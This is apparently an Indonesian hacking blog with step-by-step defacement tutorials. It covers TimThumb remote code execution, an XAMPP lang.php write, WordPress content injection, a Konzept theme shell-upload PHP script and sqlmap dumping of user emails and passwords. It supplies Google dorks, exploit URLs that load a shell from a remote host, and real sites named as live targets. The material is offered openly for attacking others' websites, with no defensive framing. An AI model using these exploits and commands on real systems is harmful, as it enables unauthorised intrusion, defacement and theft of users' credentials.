Senin, 22 Oktober 2018

Cara deface dengan Exploit Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE
yuk langsung saja ke tutorialnya,


Dork : inurl:/timthumb.php 
atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini
Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php


Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php
Untuk ciri ciri web vuln rce timthumb seperti gambar dibawah ini .

jika sudah menemukan website yang seperti itu kita langsung saja exploit seperti ini 
http://cityfordhcm.com/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
nanti akan keluar seperti gambar dibawah ini atau seperti ini

Unable to open image : /home/cityfordhcm/public_html/cache/external_66b043a706b2265ea1b66330089ac2a0.php
Query String : src=http://flickr.com.tukangpompajakarta.com/shell.php
TimThumb version : 1.30


Untuk akses shell di timthumb bisa di liat di unable to open image  berati di http://cityfordhcm.com/cache/external_66b043a706b2265ea1b66330089ac2a0.php 
Setelah itu kalian buka http://cityfordhcm.com/cache/dedot.php untuk upload shell :D

Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan Exploit Timthumb V1.XX RCE semoga bermanfaat..

List Dork Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share List Dork Timthumb V1.XX RCE .
untuk yang belum tau Cara deface dengan Exploit Timthumb V1.XX RCE  bisa kalian liat disini 



DORK Timthumb V1.XX RCE :




Mungkin sekian dulu  dari saya mengenai artikel List Dork Timthumb V1.XX RCE semoga bermanfaat.


Cara deface dengan XAMPP Local Write Access

Hello ^^ kali ini saya akan share Cara deface dengan XAMPP Local Write Access 
yuk langsung saja ke tutorialnya,


Dork :
inurl:/xampp/index.php intitle:XAMPP
inurl:/xampp/lang.php
inurl:/security/lang.php
inurl:/xampp/splash.php 

Exploit :
- localhost/xampp/lang.php?hacked_by_h0d3_g4n
- localhost/security/lang.php?hacked_by_
h0d3_g4n

Tutorial :

1. Cari targetnya pake Dork diatas.

2. Masukan salah satu exploitnya. contoh  
http://motasaindonesia.co.id/xampp/lang.php?hacked_by_h0d3_g4n

3. Ada notice seperti berikut. Abaikan saja :D . 




4. Lalu akses hasil defacenya. contoh http://www.motasaindonesia.co.id/xampp/lang.tmp



Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan XAMPP Local Write Access  semoga bermanfaat. 

Kamis, 01 Februari 2018

Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Hello para defacer Indonesia, kali ini saya akan share Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Pertama dorking dulu dengan dork ini bro
inurl:/wp-includes/rest-api
Exploit :
http://target.com/wp-json/wp/v2/posts/
Vuln seperti gambar dibawah ini
copy idnya

untuk script exploitnya kalian bisa copy disini
https://www.exploit-db.com/exploits/41224/
edit bagian  
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"

Save dengan format .rb

untuk pengguna windows kalian bisa install ruby dulu 
kebetulan saya menggunakan linux jadi langsung saja buka cmd
dan ketikan  ruby wpinject.rb





lalu masukan target http://target.com/ dan idnya yang tadi di copy


setelah itu tekan enter jika vuln akan tampil seperti ini Jika Tidak vuln Muncul Pesan "This site is not Vulnerable"






setelah itu Copas Link Tersebut Dan Buka Di Browser




mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1 
Semoga bermanfaat

Rabu, 31 Januari 2018

Cara Deface Dengan Exploit Wordpress Themes Konzept

Heloo Gan hehehe
kali ini mau share Cara Deface Dengan Exploit Wordpress Themes Konzept, ok langsung saja,

Pertama Dorking dulu gan dengan dork ini,
inurl:/includes/uploadify/uploads



ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti ini

http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php

jika vuln akan tampil seperti ini

{"jsonrpc" : "2.0", "result" : null, "id" : "id"}


 siapkan shell kalian dan rubah format shellnya menjadi .jpg
 dan copy code php dibawah ini 
<?php

$url = "http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php"; // put URL Here
$post = array
(
       "file" => "@lol.jpg",
       "name" => "lol.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo "$data\n";

?>

ganti target.com dengan web target kalian yng mau di upload shell
ganti tulisan warna biru dengan shell kalian yang telah dirubah formatnya menjadi .jpg
ganti tulisan warna merah sesuai nama shell kalian setelah itu
save code php diatas tadi dengan format .php

Langkah selanjutnya jika pengguna windows menggunakan xampp kalau pengguna linux lansung saja .
ketikan di cmd php Konzept.php tekan enter dan akan muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id"}



setelah itu buka shell acesss kalian di
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php
 
atau
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/lol.php




mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Themes Konzept  semoga bermanfaat


Selasa, 30 Januari 2018

Cara sql injection menggunakan sqlmap

Haloo gan , kali ini saya akan share tutorial hacking yaitu  Cara sql injection menggunakan sqlmap untuk hack website, xD .
sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
langsung saja ke tutorialnya, pertama siapkan toolsnya dulu bisa kalian cari digoogle yaitu sqlmap dan python kalo di windows, btw saya pake os backbox jadi ga install python sama sqlmap sudah ada langsung osnya.
cari website yang vuln terhadap sqli, bisa kalian cari dengan dork ini.

inurl:index.php?id=
inurl:cat.php?id=
dan kembangin lagi ya :v
saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di mbah google dengan dork diatas.
buka cmd dan ketikan sqlmap btw w pake os backbox jadi langsung ketik aja sqlmap kalo pake windows harus ke dir sqlmap dulu


setelah itu masukan perintah : sqlmap -u http://targetmu.com/index.php?id=12 --dbs
maka hasilnya akan seperti gambar dibawah ini



jika muncul
 "GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter

setelah itu kita telah mendapatkan nama databasenya yaitu :
available databases [3]:
[*] information_schema
[*] ntlsinsg_db
[*] ntlsinsg_test
setelah itu kita bongkar isi databasenya yang ke 2 yaitu ntlsinsg_db lalu kita masukan perintah sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db --tables
bingung liat gambar dibawah ini

maka hasilnya seperti dibawh ini

nah sekaran keluarkan tabelnya
Database: ntlsinsg_db
[13 tables]
+---------------+
| ab_policy     |
| bra_countries |
| branches      |
| customer      |
| news          |
| news_file     |
| sch_about_us  |
| sch_areas     |
| sch_countries |
| sch_new       |
| sch_ports     |
| sch_services  |
| users         |
+---------------+

sekarang kita lihat user adminnya kira kira ada di tabel mana mungkin di tabel users mari kita check 
dengan perintah 
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users --columns
maka hasilnya akan seperti ini
nah sekarang tahap terakhir yaitu dump dengan perintah seperti ini 
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users -C email,password --dump
maka hasilnya akan seperti ini 
dan taraaaaaaaa akhirnya dapat username dan passwordnya sekarang lu crack passwordnya setelah crack  tinggal cari halaman adminnya dan upload shell terus deface :v
mungkin sekian dulu dari saya mengenai artikel Cara sql injection menggunakan sqlmap  semoga bermanfaat 

Cara Deface Dengan Exploit Wordpress Store Shell Upload

Tutorial Deface With Exploit Wordpress Store Shell Upload


 

Hai gan ketemu lagi dengan saya  kumpul berbagi, yang sudah lama tidak  update wkwkwkwk tapi kali ini saya akan update setiap hari  karena ada sesuatu yang ada di blog ini   jadi kali ini mau share Cara Deface Dengan Exploit Wordpress Store Shell Upload  , ok langsung saja ke tutorialnya ...
Pertama pertama dorking dulu dengan dork 
inurl:uploads/products_img/ 

setelah dorking kita CTRL+U di websitenya untkuk cek themes yang dipake,
untuk exploitnya
/upload/upload.php
jadi kaya gini nih gan
http://www.demain-ingenieur.fr/wp-content/themes/demainingenieur/upload/upload.php
Kalo vuln blank 
live target
www.deybras.com/
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
kita copy alamatnya /url
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
setelah copy kita masuk ke csrf online bisa kamu pakai  kalian kunjungi dissini
http://sgmarketing.com.pl/nitip.php

ok langsung saja ke exploinya kita copy urlnya
isikan target dengan url yang tadi
postname ini myfile
setelah itu upload shell
suksess blank
letak shell di
http://target.com/wp-content/uploads/products_img/namashell.php
shell udah ke upload sekian tutorial dari saya
jangan lupa Share  Cara Deface Dengan Exploit Wordpress Store Shell Upload
Thanks to all member defacer indonesia :*
Jika kurang jelas bisa tonton videonya disin.  atau disini https://www.youtube.com/watch?v=xBeVii3zXPg